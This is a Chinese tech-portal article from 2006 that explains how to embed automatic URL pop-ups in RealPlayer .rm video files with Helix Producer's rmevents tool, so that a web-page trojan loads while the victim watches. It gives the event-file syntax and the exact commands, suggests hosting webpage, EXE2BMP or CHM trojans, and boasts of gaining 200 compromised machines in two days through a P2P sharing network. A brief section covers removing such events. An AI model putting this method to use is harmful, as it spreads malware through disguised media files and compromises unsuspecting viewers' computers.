新闻 | 天津 | 民生 | 广电 | 津抖云 | 微视 | 读图 | 文娱 | 体育 | 图事 | 理论 | 志愿 | 专题 | 工作室 | 不良信息举报
教育 | 健康 | 财经 | 地产 | 天津通 | 旅游 | 时尚 | 购物 | 汽车 | IT | 亲子 | 会计 | 访谈 | 场景秀 | 发布系统

"津云"客户端
  您当前的位置 : 北方网  >  IT浪潮  >  北方学院  >  软件文库  >  媒体相关
关键词:

就是这么简单:在Realplayer影片中放木马


http://www.enorth.com.cn  2006-07-14 17:35

  经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了一些相关文章才知道插入和去除的方法,好东东不敢独享,转给大家拉!

  在Real影片中放木马在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我下了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.

  新建一个文本文件rmevents.txt.输入: u 00:01:00.0 00:01:30.0 http://yjs.bit.edu.cn/bbs我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。输入rmevents -i电影.rm -e rmevents.txt -o电影1.rm这个命令,生成的电影.rm就是我们的木马文件了。 http://yjs.bit.edu.cn/bbs这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马. 防御方法更简单,嘿嘿,不看电影就没事了。要不就不用Realpalyer看吧,换别的播放器。

  去除realoneplay,里的网页问题这个弹出的网页是由一开始压制影片的人压进去的广告页。可以通过Helix Producer Plus V9.01的rmevents.exe编辑掉。

  方法一:在你的安装目录C:\Program Files\Real\Helix Producer Plus\RealMediaEditor默认是这个目录,里有一个rmevents.exe在命令提示行cmd.exe下进入这个目录,运行rmevents.exe然后建立一个内容为空的events.txt文件rmevents -i input.rm -e events.txt -o output.rm input.rm为有广告的原来的rmvb影片。 output.rm为转换后的新影片名称。可以自定义。这个相当于覆盖掉原来的Event设置,对RMVB也有效。

  方法二:直接运行C:\Program Files\Real\Helix Producer Plus\RealMediaEditor目录下的rmedtgui.exe效果跟上面的命令提示行下是一样的。运行rmedtgui.exe后,打开有广告的rmvb影片,选择菜单里的tools ——》merge events,打开新建立的空白events.txt,再在file下选择save as保存修改好的文件。 Helix Producer Plus V9.01在自由下载提供下载教你在RM中插入网址制作开始先准备个正常的RM文件下载个Helix Producer Plus安装。

  在准备个文本命令文件文本命令如下实例:在00:20.0(时分秒毫)—01:10.0时让欣赏者自动弹出http://yjs.bit.edu.cn/bbs主页在03:10.0(时分秒毫)—03:59.0时让欣赏者自动弹出http://yjs.bit.edu.cn/bbs主页1、编辑事件文件新建一个记事本文件,命名为event.txt(可随意),输入以下内容: u 00:20.0 01:10.0 http://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http://yjs.bit.edu.cn/bbs存盘后退出解释:u表示URL事件, 00:20.0是起启时间,01:10.0是结束时间,后面是指定的网页.

  下一步进入Helix Producer Plus的安装目录下的RealMediaEditor子目录,双击运行rmedtgui.exe文件,从file菜单Open打开一个Rm文件,从菜单栏的tools(工具)中选择Merge Events(合并事件),在弹出的对话框中选择刚才编辑的event.txt文件,确定后Rmedtgui开始合并事件,合并结束后,请将含有事件文件的RM文件另行保存。整个过程应当在15分钟以内完成,还是相当快的。

编辑:赵国栋
[进入IT论坛]
请您文明上网、理性发言并遵守相关规定,在注册后发表评论。
 北方网精彩内容推荐
无标题文档
天津民生资讯
天气交通 天津福彩 每月影讯 二手市场
空气质量 天津股票 广播节目 二手房源
失物招领 股市大擂台 天视节目 每日房价
热点专题
北京奥运圣火传递和谐之旅 迎奥运 讲文明 树新风
解放思想 干事创业 科学发展 同在一方热土 共建美好家园
2008天津夏季达沃斯论坛 《今日股市观察》视频
北方网网络相声频道在线收听 2008高考招生简章 复习冲刺
天津自然博物馆馆藏精品展示 2008年天津中考问题解答
带你了解08春夏服饰流行趋势 完美塑身 舞动肚皮舞(视频)
C-NCAP碰撞试验—雪佛兰景程 特殊时期善待自己 孕期检查
热点新闻排行 财经 体育 娱乐 汽车 IT 时尚 健康 教育

Copyright (C) 2000-2021 Enorth.com.cn, Tianjin ENORTH NETNEWS Co.,LTD.All rights reserved
本网站由天津北方网版权所有